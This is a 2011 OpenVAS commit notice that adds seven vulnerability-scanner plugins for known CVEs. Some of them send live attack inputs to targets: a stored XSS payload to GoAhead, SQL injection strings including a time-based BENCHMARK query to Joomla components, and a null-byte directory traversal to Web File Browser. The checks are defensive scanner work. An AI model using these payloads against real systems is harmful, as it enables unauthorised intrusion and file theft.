[Openvas-commits] r12061 - trunk/openvas-plugins/scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Wed Nov 9 14:03:18 CET 2011
Author: antu123
Date: 2011-11-09 14:03:16 +0100 (Wed, 09 Nov 2011)
New Revision: 12061
Added:
trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
Log:
Added new plugins
Added: trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_etherape_rpc_call_parsing_dos_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_etherape_rpc_call_parsing_dos_vuln.nasl 17841 2011-11-09 17:22:20Z nov $
+#
+# EtherApe RPC Packet Processing Denial of Service Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802340);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-3369");
+ script_tag(name:"cvss_base", value:"5.0");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 17:22:20 +0530 (Tue, 08 Nov 2011)");
+ script_name("EtherApe RPC Packet Processing Denial of Service Vulnerability");
+ desc = "
+ Overview: This host is installed with EtherApe and is prone to denial of
+ service vulnerabilities.
+
+ Vulnerability Insight:
+ The flaw is due to an error in the add_conversation function in
+ 'conversations.c' when processing specially crafted RPC packet.
+
+ Impact:
+ Successful exploitation allows remote attackers to cause a NULL pointer
+ dereference or cause a denial of service.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ EtherApe version prior to 0.9.12
+
+ Fix: Upgrade to EtherApe version 0.9.12 or later,
+ For updates refer, http://etherape.sourceforge.net/
+
+ References:
+ http://osvdb.org/show/osvdb/75609
+ http://secunia.com/advisories/45989
+ http://etherape.sourceforge.net/NEWS.html
+ http://www.openwall.com/lists/oss-security/2011/09/19/4
+ http://www.openwall.com/lists/oss-security/2011/09/22/1
+ http://sourceforge.net/tracker/?func=detail&aid=3309061&group_id=2712&atid=102712 ";
+
+ script_description(desc);
+ script_summary("Check for the version of EtherApe");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Denial of Service");
+ exit(0);
+}
+
+include("ssh_func.inc");
+include("version_func.inc");
+
+## Open the socket
+sock = ssh_login_or_reuse_connection();
+if(!sock){
+ exit(0);
+}
+
+## Confirm Linux, as SSH can be instslled on Windows as well
+result = ssh_cmd(socket:sock, cmd:"uname");
+if("Linux" >!< result){
+ exit(0);
+}
+
+etherapeName = find_file(file_name:"etherape", file_path:"/", useregex:TRUE,
+ regexpar:"$", sock:sock);
+
+foreach binaryName (etherapeName)
+{
+ ## Get the EtherApe version from command
+ etherVer = get_bin_version(full_prog_name:chomp(binaryName), version_argv:"--version",
+ ver_pattern:"GNOME EtherApe ([0-9.]+)", sock:sock);
+
+ if(etherVer[1])
+ {
+ ## Check for EtherApe Version less than 0.9.12
+ if(version_is_less(version:etherVer[1], test_version:"0.9.12"))
+ {
+ security_warning(0);
+ ssh_close_connection();
+ exit(0);
+ }
+ }
+}
+
+ssh_close_connection();
Added: trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_goahead_webserver_mult_stored_xss_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,110 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_goahead_webserver_mult_stored_xss_vuln.nasl 18413 2011-11-08 16:16:16Z nov $
+#
+# GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802270);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-4273");
+ script_bugtraq_id(50039);
+ script_tag(name:"cvss_base", value:"4.3");
+ script_tag(name:"risk_factor", value:"Medium");
+ script_tag(name:"creation_date", value:"2011-11-08 16:16:16 +0530 (Tue, 08 Nov 2011)");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_name("GoAhead Webserver Multiple Stored Cross Site Scripting Vulnerabilities");
+ desc = "
+ Overview: This host is running GoAhead Webserver and is prone to multiple
+ stored cross site scripting vulnerabilities.
+
+ Vulnerability Insight:
+ Multiple flaws are caused due to improper validation of user-supplied input
+ via the 'group' parameter to goform/AddGroup, related to addgroup.asp,
+ the 'url' parameter to goform/AddAccessLimit, related to addlimit.asp,
+ or the 'user' or 'group' parameter to goform/AddUser, related to adduser.asp
+
+ Impact:
+ Successful exploitation will allow remote attackers to insert arbitrary HTML
+ and script code, which will be executed in a user's browser session in the
+ context of an affected site.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ GoAhead Webserver version 2.18
+
+ Fix: No solution or patch is available as on 8th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://www.goahead.com/products/webserver/default.aspx
+
+ References:
+ http://osvdb.org/show/osvdb/76845
+ http://osvdb.org/show/osvdb/76846
+ http://osvdb.org/show/osvdb/76847
+ http://www.kb.cert.org/vuls/id/384427 ";
+
+ script_description(desc);
+ script_summary("Check if GoAhead Webserver is vulnerable to Cross-Site Scripting");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web Servers");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+ exit(0);
+}
+
+## Check Banner And Confirm Application
+banner = get_http_banner(port:port);
+if("Server: GoAhead-Webs" >!< banner) {
+ exit(0);
+}
+
+## Stored XSS (Not a safe check)
+if(safe_checks()){
+ exit(0);
+}
+
+## Construct Attack Request
+req = http_post(port:port, item:"/goform/AddGroup/addgroup.asp",
+ data:"group=<script>alert(doucment.cookie)</script>" +
+ "&privilege=4&method=1&enabled=on&ok=OK");
+## Try XSS Attack
+res = http_keepalive_send_recv(port:port, data:req);
+
+## Confirm exploit worked by checking the response
+if("<script>alert(doucment.cookie)</script>" >< res){
+ security_warning(port);
+}
Added: trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_mult_components_sql_inj_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,128 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_mult_components_sql_inj_vuln.nasl 17758 2011-11-09 15:10:29 nov $
+#
+# Joomla Multiple Components SQL Injection Vulnerabilities
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802196);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2010-4927", "CVE-2010-4928", "CVE-2010-4929", "CVE-2010-4937",
+ "CVE-2010-4945", "CVE-2010-4902", "CVE-2010-4865", "CVE-2010-4902");
+ script_bugtraq_id(43319, 33254, 43415, 42334, 42986, 43605,42986);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-03 15:42:01 +0200 (Thu, 03 Nov 2011)");
+ script_name("Joomla Multiple Components SQL Injection Vulnerabilities");
+ desc = "
+ Overview: This host is running Joomla with multiple components and is
+ prone to SQL injection vulnerabilities.
+
+ Vulnerability Insight:
+ For more information about vulnerability refer the references section.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ Joomla Joostina component
+ Joomla sgicatalog component
+ Joomla Amblog component version 1.0
+ Joomla Clantools Component version 1.2.3
+ Joomla CamelcityDB component version 2.2
+ Joomla Clantools Component version 1.2.3
+ Joomla Restaurant Guide component version 1.0.0
+ Joomla Aardvertiser Component versions 2.1 and 2.1.1
+
+ Fix: For solution or patch refer the refer section.
+ For updates refer, http://extensions.joomla.org/extensions/
+
+ References:
+ http://secunia.com/advisories/40932
+ http://secunia.com/advisories/41322
+ http://xforce.iss.net/xforce/xfdb/62151
+ http://www.exploit-db.com/exploits/14530/
+ http://www.exploit-db.com/exploits/14596/
+ http://www.exploit-db.com/exploits/14530/
+ http://www.exploit-db.com/exploits/15040/
+ http://www.exploit-db.com/exploits/15157/
+ http://www.exploit-db.com/exploits/14902/
+ http://packetstormsecurity.org/files/92305/joomlacamelcitydb2-sql.txt
+ http://packetstormsecurity.org/files/view/105704/joomlasgicatalog-sql.txt ";
+
+ script_description(desc);
+ script_summary("Check if Joomla components are vulnerable for SQL injection attack");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+ exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+ exit(0);
+}
+
+## Make list of vulnerable pages
+pages = make_list("/index.php?option=com_restaurantguide&view=country&id='&Itemid=69",
+ "/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode='",
+ "/index.php?option=com_amblog&task=editsave&articleid='",
+ "/index.php?option=com_camelcitydb2&view=all&Itemid=15",
+ "/index.php?option=com_jeguestbook&view=item_detail&d_itemid='",
+ "/index.php?option=com_clantools&squad='",
+ "'/index.php?option=com_sgicatalog&task=view&lang=en&id='",
+ "/index.php?option=com_aardvertiser&cat_name='x+AND+'1'='1&task=view");
+
+foreach page (pages)
+{
+ if(http_vuln_check(port:joomlaPort, url: joomlaDir + page, pattern: "<b>" +
+ "Warning</b>: Invalid argument supplied for foreach\(\)") ||
+ (http_vuln_check(port:joomlaPort, url:joomlaDir + page, pattern:"You have an error in " +
+ "your SQL syntax;")))
+ {
+ security_warning(joomlaPort);
+ exit(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_joomla_teams_sql_inj_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,113 @@
+##############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_joomla_teams_sql_inj_vuln.nasl 17758 2011-11-09 13:10:29 nov $
+#
+# Joomla 'Teams' Component SQL Injection Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802189);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2010-4941");
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-09 13:02:45 +0530 (Wed, 09 Nov 2011)");
+ script_name("Joomla 'Teams' Component SQL Injection Vulnerability");
+ desc = "
+ Overview: This host is running Joomla with Teams component and is prone to
+ SQL injection vulnerability.
+
+ Vulnerability Insight:
+ Input passed via the 'PlayerID' parameter to 'index.php' is not properly
+ sanitised before being used in SQL queries.
+
+ Impact:
+ Successful exploitation will let attackers to manipulate SQL queries by
+ injecting arbitrary SQL code.
+
+ Impact Level: Application.
+
+ Affected Software/OS:
+ Joomla Team Component version 1_1028_100809_1711
+
+ Fix: No solution or patch is available as on 08th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://joomla-clantools.de/downloads/cat_view/34-komponenten.html
+
+ References:
+ http://secunia.com/advisories/40933
+ http://www.exploit-db.com/exploits/14598/
+ http://www.securityfocus.com/archive/1/archive/1/512974/100/0/threaded ";
+
+ script_description(desc);
+ script_summary("Check if Joomla Teams component is vulnerable for SQL Injection attack");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_dependencies("joomla_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+joomlaPort = get_http_port(default:80);
+if(!joomlaPort){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:joomlaPort)){
+ exit(0);
+}
+
+## Get the dir from KB
+if(!joomlaDir = get_dir_from_kb(port:joomlaPort, app:"joomla")){
+ exit(0);
+}
+
+## Try an exploit
+filename = string(joomlaDir + "/index.php");
+host = get_host_name();
+postData = "FirstName=OpenVAS-SQL-Test&LastName=SecPod&Notes=sds&TeamNames" +
+ "[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT" +
+ "(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&" +
+ "task=save&controller=player";
+
+## Construct post request
+sndReq = string("POST ", filename, " HTTP/1.1\r\n",
+ "Host: ", host, "\r\n",
+ "Content-Type: application/x-www-form-urlencoded\r\n",
+ "Content-Length: ", strlen(postData), "\r\n\r\n",
+ postData);
+rcvRes = http_keepalive_send_recv(port:joomlaPort, data:sndReq);
+
+## Confirm the exploit
+if("OpenVAS-SQL-Test" >< rcvRes && "SecPod" >< rcvRes){
+ security_hole(joomlaPort);
+}
Added: trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_ms_truetype_font_privilege_elevation_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,109 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_ms_truetype_font_privilege_elevation_vuln.nasl 18377 2011-11-07 16:44:35Z nov $
+#
+# Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802500);
+ script_version("$Revision: $");
+ script_cve_id("CVE-2011-3402");
+ script_bugtraq_id(50462);
+ script_tag(name:"cvss_base", value:"9.3");
+ script_tag(name:"risk_factor", value:"Critical");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-07 16:44:35 +0530 (Mon, 07 Nov 2011)");
+ script_name("Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability");
+ desc = "
+ Overview:
+ The host is installed with Microsoft Windows operating system and is prone to
+ pivilege escalation vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to due to an error within the Win32k kernel-mode
+ driver when parsing TrueType fonts.
+
+ Impact:
+ Successful exploitation could allow attackers to execute arbitrary code with
+ kernel-level privileges. Failed exploit attempts may result in a
+ denial-of-service condition.
+
+ Impact Level: System
+
+ Affected Software/OS:
+ Microsoft Windows 7 Service Pack 1 and prior
+ Microsoft Windows XP Service Pack 3 and prior
+ Microsoft Windows Vista Service Pack 2 and prior
+ Microsoft Windows Server 2008 Service Pack 2 and prior
+ Microsoft Windows server 2003 Service Pack 2 and prior
+
+ Fix: Apply the workaround from below link,
+ http://support.microsoft.com/kb/2639658
+
+ References:
+ http://secunia.com/advisories/46724/
+ http://support.microsoft.com/kb/2639658
+ http://technet.microsoft.com/en-us/security/advisory/2639658 ";
+
+ script_description(desc);
+ script_summary("Check if t2embed.dll is accessible");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Windows");
+ script_dependencies("secpod_reg_enum.nasl");
+ script_require_ports(139, 445);
+ exit(0);
+}
+
+
+include("smb_nt.inc");
+include("secpod_reg.inc");
+include("secpod_smb_func.inc");
+
+## Check for OS
+if(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){
+ exit(0);
+}
+
+## Get System Path
+sysPath = smb_get_systemroot();
+if(!sysPath ){
+ exit(0);
+}
+
+dllPath = sysPath + "\system32\t2embed.dll";
+
+## Exit if file does not exist
+if(!dllPath){
+ exit(0);
+}
+
+share = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:dllPath);
+file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:dllPath);
+
+## Check if file is accessible by checking its size
+dllSize = get_file_size(file:file, share:share);
+if(dllSize != NULL){
+ security_hole(0);
+}
Added: trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,98 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_php_is_a_fun_arbitrary_code_exec_vuln_win.nasl 18420 2011-11-08 13:11:11Z nov $
+#
+# PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802504);
+ script_version("$Revision: $");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 13:11:11 +0530 (Tue, 08 Nov 2011)");
+ script_cve_id("CVE-2011-3379");
+ script_bugtraq_id(49754);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_name("PHP 'is_a()' Function Remote Arbitrary Code Execution Vulnerability (Windows)");
+ desc = "
+ Overview: This host is installed with PHP and is prone to remote arbitrary
+ code execution vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to error in 'is_a()' function. It receives strings as
+ first argument, which can lead to the '__autoload()' function being called
+ unexpectedly and do not properly verify input in their '__autoload()'
+ function, which leads to an unexpected attack vectors.
+
+ Impact:
+ Successful exploitation could allow remote attackers to execute arbitrary PHP
+ code by including arbitrary files from remote resources.
+
+ Impact Level: Application/System
+
+ Affected Software/OS:
+ PHP Version 5.3.7 and 5.3.8 on windows.
+
+ Fix: No solution or patch is available as on 8th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://php.net/downloads.php
+
+ Workaround:
+ Apply the workaround for PHP from below link,
+ http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/
+
+ *****
+ NOTE : Ignore this warning, if above workaround has been applied.
+ *****
+
+ References:
+ http://secunia.com/advisories/46107/
+ https://bugzilla.redhat.com/show_bug.cgi?id=741020
+ http://www.securityfocus.com/archive/1/519770/30/0/threaded
+ http://www.byte.nl/blog/2011/09/23/security-bug-in-is_a-function-in-php-5-3-7-5-3-8/ ";
+
+ script_description(desc);
+ script_summary("Check for the version of PHP");
+ script_category(ACT_GATHER_INFO);
+ script_copyright("Copyright (C) 2011 Greenbone Networks GmbH");
+ script_family("General");
+ script_dependencies("secpod_php_detect_win.nasl");
+ script_require_keys("PHP/Ver/win");
+ exit(0);
+}
+
+
+include("version_func.inc");
+
+## Get version from KB
+phpVer = get_kb_item("PHP/Ver/win");
+
+if(phpVer != NULL)
+{
+ ##Check for PHP version
+ if(version_is_equal(version:phpVer, test_version:"5.3.7") ||
+ version_is_equal(version:phpVer, test_version:"5.3.8")){
+ security_hole(0);
+ }
+}
Added: trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl 2011-11-09 12:54:45 UTC (rev 12060)
+++ trunk/openvas-plugins/scripts/gb_webfilebrowser_file_download_vuln.nasl 2011-11-09 13:03:16 UTC (rev 12061)
@@ -0,0 +1,121 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id: gb_webfilebrowser_file_download_vuln.nasl 18358 2011-11-08 17:09:26Z nov $
+#
+# Web File Browser 'act' Parameter File Download Vulnerability
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+ script_id(802341);
+ script_version("$Revision: $");
+ script_bugtraq_id(50508);
+ script_tag(name:"cvss_base", value:"7.5");
+ script_tag(name:"risk_factor", value:"High");
+ script_tag(name:"last_modification", value:"$Date: $");
+ script_tag(name:"creation_date", value:"2011-11-08 17:09:26 +0530 (Tue, 08 Nov 2011)");
+ script_name("Web File Browser 'act' Parameter File Download Vulnerability");
+ desc = "
+ Overview:
+ This host is running with Web File Browser and is prone to file download
+ vulnerability.
+
+ Vulnerability Insight:
+ The flaw is caused due to input validation error in 'act' parameter in
+ 'webFileBrowser.php', which allows attackers to download arbitrary files
+ via a '../'(dot dot) sequences.
+
+ Impact:
+ Successful exploitation could allow attackers to download and read arbitrary
+ files on the affected application.
+
+ Impact Level: Application
+
+ Affected Software/OS:
+ Web File Browser versions 0.4b14 and prior
+
+ Fix: No solution or patch is available as on 09th November, 2011. Information
+ regarding this issue will be updated once the solution details are available.
+ For updates refer, http://webfilebrowser.sourceforge.net/
+
+ References:
+ http://xforce.iss.net/xforce/xfdb/71131
+ http://www.exploit-db.com/exploits/18070/
+ http://www.securityfocus.com/bid/50508/exploit ";
+
+ script_description(desc);
+ script_summary("Check for file download vulnerability in Web File Browser");
+ script_category(ACT_ATTACK);
+ script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
+ script_family("Web application abuses");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+##
+## The script code starts here
+##
+
+include("http_func.inc");
+include("host_details.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+if(!port){
+ exit(0);
+}
+
+## Check Host Supports PHP
+if(!can_host_php(port:port)){
+ exit(0);
+}
+
+foreach dir (make_list("/webFileBrowser", "/webfilebrowser", "/", cgi_dirs()))
+{
+ ## Send and Receive the response
+ sndReq = http_get(item:string(dir, "/webFileBrowser.php"), port:port);
+ rcvRes = http_send_recv(port:port, data:sndReq);
+
+ ## Confirm application is NetArt Media Car Portal
+ if("<title>Web File Browser" >< rcvRes)
+ {
+ ## traversal_files() function Returns Dictionary (i.e key value pair)
+ ## Get Content to be checked and file to be check
+ files = traversal_files();
+
+ foreach file (keys(files))
+ {
+ ## Construct directory traversal attack
+ url = string(dir, "/webFileBrowser.php?act=download&subdir=&sortby=name&file=",
+ crap(data:"../",length:6*9),files[file],"%00");
+
+ ## Confirm exploit worked properly or not
+ if(http_vuln_check(port:port, url:url,pattern:file))
+ {
+ security_hole(port:port);
+ exit(0);
+ }
+ }
+ }
+}
More information about the Openvas-commits
mailing list